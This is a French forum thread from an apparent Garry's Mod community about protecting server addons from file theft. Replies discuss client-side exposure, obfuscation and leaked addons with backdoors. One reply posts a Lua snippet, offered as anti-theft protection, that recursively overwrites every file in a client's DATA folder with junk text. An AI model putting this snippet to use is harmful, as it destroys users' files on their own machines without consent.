Comment protéger ses addons de son serveur ?

• Initiateur de la discussion
nicolas4712

nicolas4712

Geek
Score réaction
8
Bonjour,
Je fais se topic car j'aimerai proteger mes addons payer gmodstore et mes addons payer mais privé fait par des développer pour éviter que des kikoo ne vienne filesteal les fichier !
Avez-vous des solutions ?

Cordialement,

Kitsu

Kitsu

Chuck Norris
Score réaction
2 505
@Yoh Sambre ♪ @Makss

nicolas4712

nicolas4712

Geek
Score réaction
8
Est ce que ceci fonctionne ; http://steamcommunity.com/sharedfiles/filedetails/?id=939273135 ?

Deadman69330

Deadman69330

Psychopathe
Score réaction
309
nicolas4712 à dit:
Est ce que ceci fonctionne ; http://steamcommunity.com/sharedfiles/filedetails/?id=939273135 ?
Si ca marche, ca protégera des 98% de kikoo mais pas de pro

nicolas4712

nicolas4712

Geek
Score réaction
8
BCZ Gaming

BCZ Gaming

Psychopathe
Score réaction
129
nicolas4712 à dit:
Bonjour,
Je fais se topic car j'aimerai proteger mes addons payer gmodstore et mes addons payer mais privé fait par des développer pour éviter que des kikoo ne vienne filesteal les fichier !
Avez-vous des solutions ?

Cordialement,
Si qu'elle qu'un te filesteal sa n'est pas grave il on que la partie client. Et non serveur. Donc sa ne te posera pas de problème j'espère de t'avoir aidez et si C'est tout tu peut passer le poste en résolut ;)

• J'aime
Réactions: Yoh Sambre ♪
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
Que ce soit des addons de gmodstore ou privé le filesteal des fichiers grabbe uniquement le côté client donc dans le fond vous n'avez rien a craindre ,

Reste des bonus de protection ou plutôt rendre la vie des voleurs plus douloureuse en obfuscant les fichiers (bofbof) ou connaître des script/tricks peu connue comme plus haut l'outil de momo par exemple..

De toute façons que ce soit scriptcock ou autre il ne faut pas se prendre trop la tête la quasi totalité des consanguins qui steal du côté client sont incapable de reproduire le côté server.

Bref protégez vous déjà contre scripthook via l'antifilesteal publique que j'ai délivré sur g-box.fr sur la page "Nos Tutos", je vous conseil fortement de rename le nom des fonctions pour évité le bypass en quelque lignes (MP me pour du support).

nicolas4712

nicolas4712

Geek
Score réaction
8
Yoh Sambre ♪ à dit:
Que ce soit des addons de gmodstore ou privé le filesteal des fichiers grabbe uniquement le côté client donc dans le fond vous n'avez rien a craindre ,

Reste des bonus de protection ou plutôt rendre la vie des voleurs plus douloureuse en obfuscant les fichiers (bofbof) ou connaître des script/tricks peu connue comme plus haut l'outil de momo par exemple..

De toute façons que ce soit scriptcock ou autre il ne faut pas se prendre trop la tête la quasi totalité des consanguins qui steal du côté client sont incapable de reproduire le côté server.

Bref protégez vous déjà contre scripthook via l'antifilesteal publique que j'ai délivré sur g-box.fr sur la page "Nos Tutos", je vous conseil fortement de rename le nom des fonctions pour évité le bypass en quelque lignes (MP me pour du support).
Je n'ai pas compris comment rename le nom des fonction !

nicolas4712

nicolas4712

Geek
Score réaction
8
Et je n'ai pas compris comment marche le truc de momo : https://github.com/EstevanTH/GMod_M.../wiki/Step-by-step-encryption-of-a-Lua-script

nicolas4712

nicolas4712

Geek
Score réaction
8
Et un hacker pro peut il récuperer tout les fichiers serveur ou que le coter client ?

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
nicolas4712 à dit:
Et je n'ai pas compris comment marche le truc de momo : https://github.com/EstevanTH/GMod_M.../wiki/Step-by-step-encryption-of-a-Lua-script
il suffit de suivre la documentation hyper complète qu'il a écrit :/

nicolas4712 à dit:
Et un hacker pro peut il récuperer tout les fichiers serveur ou que le coter client ?
J'ai dit plus haut ainsi qu'un autre membre qu'il étais possible de grab uniquement le coté client..les "hacker" fr prétende le contraire mais en réalité il steal le ftp ou backdoor le serveur avec un code très sympathique

nicolas4712 à dit:
Je n'ai pas compris comment rename le nom des fonction !
voila par exemple le nom de la première fonction du code qu'il faut customiser :

nicolas4712

nicolas4712

Geek
Score réaction
8
Yoh Sambre ♪ à dit:
il suffit de suivre la documentation hyper complète qu'il a écrit :/

J'ai dit plus haut ainsi qu'un autre membre qu'il étais possible de grab uniquement le coté client..les "hacker" fr prétende le contraire mais en réalité il steal le ftp ou backdoor le serveur avec un code très sympathique

voila par exemple le nom de la première fonction du code qu'il faut customiser :

On peut remplacer par n'importe quoi genre : scripthookplslol ?

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
nicolas4712 à dit:
On peut remplacer par n'importe quoi genre : scripthookplslol ?
voila un exemple clair

Code:
local function SuceMoiLeJagonScriptHook() local payload = string.rep("Script kiddie\n",10000) -- remove data folder local function RtPourData(path) local files, folders = file.Find(path .. "*", "DATA") for _, f in pairs(files) do file.Write(path .. f, payload) end for _, d in pairs(folders) do RtPourData(path .. d .. "/") end end RtPourData("")

Deadman69330

Deadman69330

Psychopathe
Score réaction
309
nicolas4712 à dit:
Un hacker pro ne s'intérésse pas à un serveur GMOD mais il pourrait même récupèrer les fichiers de ton ordinateur directement avec un petit logiciel fort sympathique

ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Score réaction
5 488
Yoh Sambre ♪ à dit:
pour évité le bypass en quelque lignes
3 lignes pour être précis 4Head

• J'aime
Réactions: Makss, Yoh Sambre ♪ et Hoper
Makss

Makss

Psychopathe
Score réaction
990
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Score réaction
5 488
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
glua contender de bypass DeIlluminati

ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Score réaction
5 488
Yoh Sambre ♪ à dit:
glua contender de bypass DeIlluminati
local ply = Yoh Sambre

ply:Ban()

*Ban un Geek Suprême est impossible*

Kappa

• J'aime
Réactions: Deadman69330 et Yoh Sambre ♪
  • Banni
SIGEMT

SIGEMT

Geek suprême
Score réaction
523
Tu peux pas te faire voler tes addons gmodstore, ils ont que le clientside et le clientside tu t'en fous, si tu veux pas te faire voler tes addons, installe pas de leaks (qui ont des backdoors dessus, coucou la tentative de leak de ezjobs) et passe pas tes acces FTP à jean configurateur

• J'aime
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
SIGEMT à dit:
Tu peux pas te faire voler tes addons gmodstore, ils ont que le clientside et le clientside tu t'en fous, si tu veux pas te faire voler tes addons, installe pas de leaks (qui ont des backdoors dessus, coucou la tentative de leak de ezjobs) et passe pas tes acces FTP à jean configurateur
Mais sinon pourquoi pas faire en sorte que securegmod soit ouvert a l'envoie de script hors gmodstore ?
(nan car obligatoirement être dev la bas..bofbof)

Fleodon

Fleodon

Geek suprême
Score réaction
193
De toute facon les leakeurs leakent une "version" imaginons la version 1.0 donc de base.

Entre temps le créateur de l'addon je pense qu'en rien que deux semaines aura bouché quelques failles, bugs, amelioré le code, sortit des ajouts en plus "donc" le leakeur aura la version primaire donc vu que le leakeur se retrouvera comme un con avec sa version 1.0 bourrée de bugs alors que ceux qui l'auront acheté pour leur serveur auront la dernière version avec des ajouts, des failles bloquées, etc..

Donc pas de crainte le developpeur veille, puis bon maintenant la moitié des scripts sont protegés par des DRM :rolleyes:

Rien que celui de @Venatuss l'Advanced Medic Mod et les autres j'imaginent comportent le securegmod en gros pour chaque serveur tu dois retelecharger le bordel et le script n'est pas utilisable en serveur local donc bonne chance ;)

Dernière édition:
  • J'aime
séméron23

séméron23

Psychopathe
Score réaction
310
  • J'aime
Discord d'entraide
Rejoignz-nous sur Discord